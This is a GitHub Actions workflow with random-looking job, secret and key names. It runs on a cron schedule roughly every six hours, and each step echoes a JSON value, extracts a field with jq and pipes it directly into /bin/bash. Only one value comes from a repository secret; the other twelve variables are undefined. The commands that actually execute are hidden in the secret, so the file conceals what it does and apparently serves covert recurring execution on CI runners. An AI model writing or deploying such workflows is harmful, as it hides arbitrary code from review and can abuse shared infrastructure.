name: shici1sc
on:
  workflow_dispatch:
  schedule:
    - cron: '41 4/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: shici1sc
        env:
          es5860: ${{ secrets.es5860 }}
        run: |
          echo $es5860 | jq -r .mmfxn55 | /bin/bash
          echo $xnie82 | jq -r .anl40626 | /bin/bash
          echo $ru7 | jq -r .hvaf48240 | /bin/bash
          echo $fw9472 | jq -r .varej00 | /bin/bash
          echo $dj2251 | jq -r .rl3 | /bin/bash
          echo $th170 | jq -r .oap800 | /bin/bash
          echo $trdpp729 | jq -r .un6 | /bin/bash
          echo $ahlbi5086 | jq -r .bkc9570 | /bin/bash
          echo $vzw88321 | jq -r .v85559 | /bin/bash
          echo $cbi17 | jq -r .imf0041 | /bin/bash
          echo $cxnhp96 | jq -r .lf58 | /bin/bash
          echo $ahxy47085 | jq -r .ukf8672 | /bin/bash
          echo $wfuoc1 | jq -r .ewi23205 | /bin/bash

